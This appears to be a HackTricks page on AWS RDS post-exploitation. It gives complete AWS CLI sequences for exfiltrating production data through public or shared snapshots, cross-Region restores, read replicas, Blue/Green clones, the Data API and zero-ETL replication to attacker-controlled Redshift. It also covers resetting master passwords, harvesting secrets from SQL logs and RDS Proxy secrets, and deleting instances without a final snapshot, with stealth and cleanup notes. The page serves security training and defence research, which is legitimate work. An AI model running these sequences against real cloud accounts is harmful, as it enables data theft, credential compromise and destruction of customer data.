AWS - RDS Post Exploitation

Reading time: 21 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

RDS

For more information check:

AWS - Relational Database (RDS) Enum

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

If the attacker has enough permissions, he could make a DB publicly accessible by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot.

bash
aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
    --db-instance-identifier <db-id> \
    --db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
    --db-instance-identifier "new-db-not-malicious" \
    --db-snapshot-identifier <scapshotId> \
    --db-subnet-group-name <db subnet group> \
    --publicly-accessible \
    --vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
    --db-instance-identifier "new-db-not-malicious" \
    --master-user-password 'Llaody2f6.123' \
    --apply-immediately

# Connect to the new DB after a few mins

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

An attacker with these permissions could create an snapshot of a DB and make it publicly available. Then, he could just create in his own account a DB from that snapshot.

If the attacker doesn't have the rds:CreateDBSnapshot, he still could make other created snapshots public.

bash
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}

rds:DownloadDBLogFilePortion

An attacker with the rds:DownloadDBLogFilePortion permission can download portions of an RDS instance's log files. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.

bash
aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text

Potential Impact: Access to sensitive information or unauthorized actions using leaked credentials.

rds:DeleteDBInstance

An attacker with these permissions can DoS existing RDS instances.

bash
# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot

Potential impact: Deletion of existing RDS instances, and potential loss of data.

rds:StartExportTask

note

TODO: Test

An attacker with this permission can export an RDS instance snapshot to an S3 bucket. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.

bash
aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id

Potential impact: Access to sensitive data in the exported snapshot.

Cross-Region Automated Backups Replication for Stealthy Restore (rds:StartDBInstanceAutomatedBackupsReplication)

Abuse cross-Region automated backups replication to quietly duplicate an RDS instance's automated backups into another AWS Region and restore there. The attacker can then make the restored DB publicly accessible and reset the master password to access data out-of-band in a Region defenders might not monitor.

Permissions needed (minimum):

  • rds:StartDBInstanceAutomatedBackupsReplication in the destination Region
  • rds:DescribeDBInstanceAutomatedBackups in the destination Region
  • rds:RestoreDBInstanceToPointInTime in the destination Region
  • rds:ModifyDBInstance in the destination Region
  • rds:StopDBInstanceAutomatedBackupsReplication (optional cleanup)
  • ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress (to expose the restored DB)

Impact: Persistence and data exfiltration by restoring a copy of production data into another Region and exposing it publicly with attacker-controlled credentials.

End-to-end CLI (replace placeholders)
bash
# 1) Recon (SOURCE region A)
aws rds describe-db-instances \
  --region <SOURCE_REGION> \
  --query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,DBInstanceStatus,PreferredBackupWindow]' \
  --output table

# 2) Start cross-Region automated backups replication (run in DEST region B)
aws rds start-db-instance-automated-backups-replication \
  --region <DEST_REGION> \
  --source-db-instance-arn <SOURCE_DB_INSTANCE_ARN> \
  --source-region <SOURCE_REGION> \
  --backup-retention-period 7

# 3) Wait for replication to be ready in DEST
aws rds describe-db-instance-automated-backups \
  --region <DEST_REGION> \
  --query 'DBInstanceAutomatedBackups[*].[DBInstanceAutomatedBackupsArn,DBInstanceIdentifier,Status]' \
  --output table
# Proceed when Status is "replicating" or "active" and note the DBInstanceAutomatedBackupsArn

# 4) Restore to latest restorable time in DEST
aws rds restore-db-instance-to-point-in-time \
  --region <DEST_REGION> \
  --source-db-instance-automated-backups-arn <AUTO_BACKUP_ARN> \
  --target-db-instance-identifier <TARGET_DB_ID> \
  --use-latest-restorable-time \
  --db-instance-class db.t3.micro
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>

# 5) Make public and reset credentials in DEST
# 5a) Create/choose an open SG permitting TCP/3306 (adjust engine/port as needed)
OPEN_SG_ID=$(aws ec2 create-security-group --region <DEST_REGION> \
  --group-name open-rds-<RAND> --description open --vpc-id <DEST_VPC_ID> \
  --query GroupId --output text)
aws ec2 authorize-security-group-ingress --region <DEST_REGION> \
  --group-id "$OPEN_SG_ID" \
  --ip-permissions IpProtocol=tcp,FromPort=3306,ToPort=3306,IpRanges='[{CidrIp=0.0.0.0/0}]'

# 5b) Publicly expose restored DB and attach the SG
aws rds modify-db-instance --region <DEST_REGION> \
  --db-instance-identifier <TARGET_DB_ID> \
  --publicly-accessible \
  --vpc-security-group-ids "$OPEN_SG_ID" \
  --apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>

# 5c) Reset the master password
aws rds modify-db-instance --region <DEST_REGION> \
  --db-instance-identifier <TARGET_DB_ID> \
  --master-user-password '<NEW_STRONG_PASSWORD>' \
  --apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>

# 6) Connect to <TARGET_DB_ID> endpoint and validate data (example for MySQL)
ENDPOINT=$(aws rds describe-db-instances --region <DEST_REGION> \
  --db-instance-identifier <TARGET_DB_ID> \
  --query 'DBInstances[0].Endpoint.Address' --output text)
mysql -h "$ENDPOINT" -u <MASTER_USERNAME> -p'<NEW_STRONG_PASSWORD>' -e 'SHOW DATABASES;'

# 7) Optional: stop replication
aws rds stop-db-instance-automated-backups-replication \
  --region <DEST_REGION> \
  --source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>

Enable full SQL logging via DB parameter groups and exfiltrate via RDS log APIs

Abuse rds:ModifyDBParameterGroup with RDS log download APIs to capture all SQL statements executed by applications (no DB engine credentials needed). Enable engine SQL logging and pull the file logs via rds:DescribeDBLogFiles and rds:DownloadDBLogFilePortion (or the REST downloadCompleteLogFile). Useful to collect queries that may contain secrets/PII/JWTs.

Permissions needed (minimum):

  • rds:DescribeDBInstances, rds:DescribeDBLogFiles, rds:DownloadDBLogFilePortion
  • rds:CreateDBParameterGroup, rds:ModifyDBParameterGroup
  • rds:ModifyDBInstance (only to attach a custom parameter group if the instance is using the default one)
  • rds:RebootDBInstance (for parameters requiring reboot, e.g., PostgreSQL)

Steps

  1. Recon target and current parameter group
bash
aws rds describe-db-instances \
  --query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBParameterGroups[0].DBParameterGroupName]' \
  --output table
  1. Ensure a custom DB parameter group is attached (cannot edit the default)
  • If the instance already uses a custom group, reuse its name in the next step.
  • Otherwise create and attach one matching the engine family:
bash
# Example for PostgreSQL 16
aws rds create-db-parameter-group \
  --db-parameter-group-name ht-logs-pg \
  --db-parameter-group-family postgres16 \
  --description "HT logging"

aws rds modify-db-instance \
  --db-instance-identifier <DB> \
  --db-parameter-group-name ht-logs-pg \
  --apply-immediately
# Wait until status becomes "available"
  1. Enable verbose SQL logging
  • MySQL engines (immediate / no reboot):
bash
aws rds modify-db-parameter-group \
  --db-parameter-group-name <PGNAME> \
  --parameters \
  "ParameterName=general_log,ParameterValue=1,ApplyMethod=immediate" \
  "ParameterName=log_output,ParameterValue=FILE,ApplyMethod=immediate"
# Optional extras:
#   "ParameterName=slow_query_log,ParameterValue=1,ApplyMethod=immediate" \
#   "ParameterName=long_query_time,ParameterValue=0,ApplyMethod=immediate"
  • PostgreSQL engines (reboot required):
bash
aws rds modify-db-parameter-group \
  --db-parameter-group-name <PGNAME> \
  --parameters \
  "ParameterName=log_statement,ParameterValue=all,ApplyMethod=pending-reboot"
# Optional to log duration for every statement:
#   "ParameterName=log_min_duration_statement,ParameterValue=0,ApplyMethod=pending-reboot"

# Reboot if any parameter is pending-reboot
aws rds reboot-db-instance --db-instance-identifier <DB>
  1. Let the workload run (or generate queries). Statements will be written to engine file logs
  • MySQL: general/mysql-general.log
  • PostgreSQL: postgresql.log
  1. Discover and download logs (no DB creds required)
bash
aws rds describe-db-log-files --db-instance-identifier <DB>

# Pull full file via portions (iterate until AdditionalDataPending=false). For small logs a single call is enough:
aws rds download-db-log-file-portion \
  --db-instance-identifier <DB> \
  --log-file-name general/mysql-general.log \
  --starting-token 0 \
  --output text > dump.log
  1. Analyze offline for sensitive data
bash
grep -Ei "password=|aws_access_key_id|secret|authorization:|bearer" dump.log | sed 's/\(aws_access_key_id=\)[A-Z0-9]*/\1AKIA.../; s/\(secret=\).*/\1REDACTED/; s/\(Bearer \).*/\1REDACTED/' | head

Example evidence (redacted):

text
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('user=alice password=Sup3rS3cret!')
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('authorization: Bearer REDACTED')
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('aws_access_key_id=AKIA... secret=REDACTED')

Cleanup

  • Revert parameters to defaults and reboot if required:
bash
# MySQL
aws rds modify-db-parameter-group \
  --db-parameter-group-name <PGNAME> \
  --parameters \
  "ParameterName=general_log,ParameterValue=0,ApplyMethod=immediate"

# PostgreSQL
aws rds modify-db-parameter-group \
  --db-parameter-group-name <PGNAME> \
  --parameters \
  "ParameterName=log_statement,ParameterValue=none,ApplyMethod=pending-reboot"
# Reboot if pending-reboot

Impact: Post-exploitation data access by capturing all application SQL statements via AWS APIs (no DB creds), potentially leaking secrets, JWTs, and PII.

rds:CreateDBInstanceReadReplica, rds:ModifyDBInstance

Abuse RDS read replicas to gain out-of-band read access without touching the primary instance credentials. An attacker can create a read replica from a production instance, reset the replica's master password (this does not change the primary), and optionally expose the replica publicly to exfiltrate data.

Permissions needed (minimum):

  • rds:DescribeDBInstances
  • rds:CreateDBInstanceReadReplica
  • rds:ModifyDBInstance
  • ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress (if exposing publicly)

Impact: Read-only access to production data via a replica with attacker-controlled credentials; lower detection likelihood as the primary remains untouched and replication continues.

bash
# 1) Recon: find non-Aurora sources with backups enabled
aws rds describe-db-instances \
  --query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBInstanceArn,DBSubnetGroup.DBSubnetGroupName,VpcSecurityGroups[0].VpcSecurityGroupId,PubliclyAccessible]' \
  --output table

# 2) Create a permissive SG (replace <VPC_ID> and <YOUR_IP/32>)
aws ec2 create-security-group --group-name rds-repl-exfil --description 'RDS replica exfil' --vpc-id <VPC_ID> --query GroupId --output text
aws ec2 authorize-security-group-ingress --group-id <SGID> --ip-permissions '[{"IpProtocol":"tcp","FromPort":3306,"ToPort":3306,"IpRanges":[{"CidrIp":"<YOUR_IP/32>","Description":"tester"}]}]'

# 3) Create the read replica (optionally public)
aws rds create-db-instance-read-replica \
  --db-instance-identifier <REPL_ID> \
  --source-db-instance-identifier <SOURCE_DB> \
  --db-instance-class db.t3.medium \
  --publicly-accessible \
  --vpc-security-group-ids <SGID>
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>

# 4) Reset ONLY the replica master password (primary unchanged)
aws rds modify-db-instance --db-instance-identifier <REPL_ID> --master-user-password 'NewStr0ng!Passw0rd' --apply-immediately
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>

# 5) Connect and dump (use the SOURCE master username + NEW password)
REPL_ENDPOINT=$(aws rds describe-db-instances --db-instance-identifier <REPL_ID> --query 'DBInstances[0].Endpoint.Address' --output text)
# e.g., with mysql client:  mysql -h "$REPL_ENDPOINT" -u <MASTER_USERNAME> -p'NewStr0ng!Passw0rd' -e 'SHOW DATABASES; SELECT @@read_only, CURRENT_USER();'

# Optional: promote for persistence
# aws rds promote-read-replica --db-instance-identifier <REPL_ID>

Example evidence (MySQL):

  • Replica DB status: available, read replication: replicating
  • Successful connection with new password and @@read_only=1 confirming read-only replica access.

rds:CreateBlueGreenDeployment, rds:ModifyDBInstance

Abuse RDS Blue/Green to clone a production DB into a continuously replicated, read‑only green environment. Then reset the green master credentials to access the data without touching the blue (prod) instance. This is stealthier than snapshot sharing and often bypasses monitoring focused only on the source.

bash
# 1) Recon – find eligible source (non‑Aurora MySQL/PostgreSQL in the same account)
aws rds describe-db-instances \
  --query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,EngineVersion,DBSubnetGroup.DBSubnetGroupName,PubliclyAccessible]'

# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), no RDS Proxy, supported engine/version

# 2) Create Blue/Green deployment (replicates blue->green continuously)
aws rds create-blue-green-deployment \
  --blue-green-deployment-name ht-bgd-attack \
  --source <BLUE_DB_ARN> \
  # Optional to upgrade: --target-engine-version <same-or-higher-compatible>

# Wait until deployment Status becomes AVAILABLE, then note the green DB id
aws rds describe-blue-green-deployments \
  --blue-green-deployment-identifier <BGD_ID> \
  --query 'BlueGreenDeployments[0].SwitchoverDetails[0].TargetMember'

# Typical green id: <blue>-green-XXXX

# 3) Reset the green master password (does not affect blue)
aws rds modify-db-instance \
  --db-instance-identifier <GREEN_DB_ID> \
  --master-user-password 'Gr33n!Exfil#1' \
  --apply-immediately

# Optional: expose the green for direct access (attach an SG that allows the DB port)
aws rds modify-db-instance \
  --db-instance-identifier <GREEN_DB_ID> \
  --publicly-accessible \
  --vpc-security-group-ids <SG_ALLOWING_DB_PORT> \
  --apply-immediately

# 4) Connect to the green endpoint and query/exfiltrate (green is read‑only)
aws rds describe-db-instances \
  --db-instance-identifier <GREEN_DB_ID> \
  --query 'DBInstances[0].Endpoint.Address' --output text

# Then connect with the master username and the new password and run SELECT/dumps
# e.g. MySQL: mysql -h <endpoint> -u <master_user> -p'Gr33n!Exfil#1'

# 5) Cleanup – remove blue/green and the green resources
aws rds delete-blue-green-deployment \
  --blue-green-deployment-identifier <BGD_ID> \
  --delete-target true

Impact: Read-only but full data access to a near-real-time clone of production without modifying the production instance. Useful for stealthy data extraction and offline analysis.

Out-of-band SQL via RDS Data API by enabling HTTP endpoint + resetting master password

Abuse Aurora to enable the RDS Data API HTTP endpoint on a target cluster, reset the master password to a value you control, and run SQL over HTTPS (no VPC network path required). Works on Aurora engines that support the Data API/EnableHttpEndpoint (e.g., Aurora MySQL 8.0 provisioned; some Aurora PostgreSQL/MySQL versions).

Permissions (minimum):

  • rds:DescribeDBClusters, rds:ModifyDBCluster (or rds:EnableHttpEndpoint)
  • secretsmanager:CreateSecret
  • rds-data:ExecuteStatement (and rds-data:BatchExecuteStatement if used)

Impact: Bypass network segmentation and exfiltrate data via AWS APIs without direct VPC connectivity to the DB.

End-to-end CLI (Aurora MySQL example)
bash
# 1) Identify target cluster ARN
REGION=us-east-1
CLUSTER_ID=<target-cluster-id>
CLUSTER_ARN=$(aws rds describe-db-clusters --region $REGION \
  --db-cluster-identifier $CLUSTER_ID \
  --query 'DBClusters[0].DBClusterArn' --output text)

# 2) Enable Data API HTTP endpoint on the cluster
# Either of the following (depending on API/engine support):
aws rds enable-http-endpoint --region $REGION --resource-arn "$CLUSTER_ARN"
# or
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --enable-http-endpoint --apply-immediately

# Wait until HttpEndpointEnabled is True
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --query 'DBClusters[0].HttpEndpointEnabled' --output text

# 3) Reset master password to attacker-controlled value
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --master-user-password 'Sup3rStr0ng!1' --apply-immediately
# Wait until pending password change is applied
while :; do
  aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
  P=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
     --query 'DBClusters[0].PendingModifiedValues.MasterUserPassword' --output text)
  [[ "$P" == "None" || "$P" == "null" ]] && break
  sleep 10
done

# 4) Create a Secrets Manager secret for Data API auth
SECRET_ARN=$(aws secretsmanager create-secret --region $REGION --name rdsdata/demo-$CLUSTER_ID \
  --secret-string '{"username":"admin","password":"Sup3rStr0ng!1"}' \
  --query ARN --output text)

# 5) Prove out-of-band SQL via HTTPS using rds-data
# (Example with Aurora MySQL; for PostgreSQL, adjust SQL and username accordingly)
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
  --secret-arn "$SECRET_ARN" --database mysql --sql "create database if not exists demo;"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
  --secret-arn "$SECRET_ARN" --database demo --sql "create table if not exists pii(note text);"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
  --secret-arn "$SECRET_ARN" --database demo --sql "insert into pii(note) values ('token=SECRET_JWT');"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
  --secret-arn "$SECRET_ARN" --database demo --sql "select current_user(), now(), (select count(*) from pii) as row_count;" \
  --format-records-as JSON

Notes:

  • If multi-statement SQL is rejected by rds-data, issue separate execute-statement calls.
  • For engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn.
  • Ensure the engine/version actually supports the Data API; otherwise HttpEndpointEnabled will remain False.

Harvest DB credentials via RDS Proxy auth secrets (rds:DescribeDBProxies + secretsmanager:GetSecretValue)

Abuse RDS Proxy configuration to discover the Secrets Manager secret used for backend authentication, then read the secret to obtain database credentials. Many environments grant broad secretsmanager:GetSecretValue, making this a low-friction pivot to DB creds. If the secret uses a CMK, mis-scoped KMS permissions may also allow kms:Decrypt.

Permissions needed (minimum):

  • rds:DescribeDBProxies
  • secretsmanager:GetSecretValue on the referenced SecretArn
  • Optional when the secret uses a CMK: kms:Decrypt on that key

Impact: Immediate disclosure of DB username/password configured on the proxy; enables direct DB access or further lateral movement.

Steps

bash
# 1) Enumerate proxies and extract the SecretArn used for auth
aws rds describe-db-proxies \
  --query DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn] \
  --output table

# 2) Read the secret value (common over-permission)
aws secretsmanager get-secret-value \
  --secret-id <SecretArnFromProxy> \
  --query SecretString --output text
# Example output: {"username":"admin","password":"S3cr3t!"}

Lab (minimal to reproduce)

bash
REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SECRET_ARN=$(aws secretsmanager create-secret \
  --region $REGION --name rds/proxy/aurora-demo \
  --secret-string username:admin \
  --query ARN --output text)
aws iam create-role --role-name rds-proxy-secret-role \
  --assume-role-policy-document Version:2012-10-17
aws iam attach-role-policy --role-name rds-proxy-secret-role \
  --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
  --auth [AuthScheme:SECRETS] \
  --role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
  --vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text)
aws rds wait db-proxy-available --db-proxy-name p0
# Now run the enumeration + secret read from the Steps above

Cleanup (lab)

bash
aws rds delete-db-proxy --db-proxy-name p0
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery

Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration)

Abuse Aurora PostgreSQL zero‑ETL integration to continuously replicate production data into a Redshift Serverless namespace you control. With a permissive Redshift resource policy that authorizes CreateInboundIntegration/AuthorizeInboundIntegration for a specific Aurora cluster ARN, an attacker can establish a near‑real‑time data copy without DB creds, snapshots or network exposure.

Permissions needed (minimum):

  • rds:CreateIntegration, rds:DescribeIntegrations, rds:DeleteIntegration
  • redshift:PutResourcePolicy, redshift:DescribeInboundIntegrations, redshift:DescribeIntegrations
  • redshift-data:ExecuteStatement/GetStatementResult/ListDatabases (to query)
  • rds-data:ExecuteStatement (optional; to seed data if needed)

Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.

1) Create Redshift Serverless namespace + workgroup
bash
REGION=us-east-1
RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \
  --admin-username adminuser --admin-user-password 'AdminPwd-1!' \
  --query namespace.namespaceArn --output text)
RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \
  --namespace-name ztl-ns --base-capacity 8 --publicly-accessible \
  --query workgroup.workgroupArn --output text)
# Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL)
aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \
  --config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true
2) Configure Redshift resource policy to allow the Aurora source
bash
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SRC_ARN=<AURORA_CLUSTER_ARN>
cat > rs-rp.json <<JSON
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AuthorizeInboundByRedshiftService",
      "Effect": "Allow",
      "Principal": {"Service": "redshift.amazonaws.com"},
      "Action": "redshift:AuthorizeInboundIntegration",
      "Resource": "$RS_NS_ARN",
      "Condition": {"StringEquals": {"aws:SourceArn": "$SRC_ARN"}}
    },
    {
      "Sid": "AllowCreateInboundFromAccount",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::$ACCOUNT_ID:root"},
      "Action": "redshift:CreateInboundIntegration",
      "Resource": "$RS_NS_ARN"
    }
  ]
}
JSON
aws redshift put-resource-policy --region $REGION --resource-arn "$RS_NS_ARN" --policy file://rs-rp.json
3) Create Aurora PostgreSQL cluster (enable Data API and logical replication)
bash
CLUSTER_ID=aurora-ztl
aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --engine aurora-postgresql --engine-version 16.4 \
  --master-username postgres --master-user-password 'InitPwd-1!' \
  --enable-http-endpoint --no-deletion-protection --backup-retention-period 1
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
# Serverless v2 instance
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately
aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \
  --db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
# Cluster parameter group for zero‑ETL
aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \
  --db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params"
aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \
  ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
  ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
  ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \
  ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately
aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text)
4) Create the zero‑ETL integration from RDS
bash
# Include all tables in the default 'postgres' database
aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \
  --target-arn "$RS_NS_ARN" --integration-name ztl-demo \
  --data-filter 'include: postgres.*.*'
# Redshift inbound integration should become ACTIVE
aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN"
5) Materialize and query replicated data in Redshift
bash
# Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION)
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
  --sql "select integration_id from svv_integration"  # take the GUID value
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
  --sql "create database ztl_db from integration '<integration_id>' database postgres"
# List tables replicated
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \
  --sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;"

Evidence observed in test:

  • redshift describe-inbound-integrations: Status ACTIVE for Integration arn:...377a462b-...
  • SVV_INTEGRATION showed integration_id 377a462b-c42c-4f08-937b-77fe75d98211 and state PendingDbConnectState prior to DB creation.
  • After CREATE DATABASE FROM INTEGRATION, listing tables revealed schema ztl and table customers; selecting from ztl.customers returned 2 rows (Alice, Bob).

Impact: Continuous near‑real‑time exfiltration of selected Aurora PostgreSQL tables into Redshift Serverless controlled by the attacker, without using database credentials, backups, or network access to the source cluster.

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks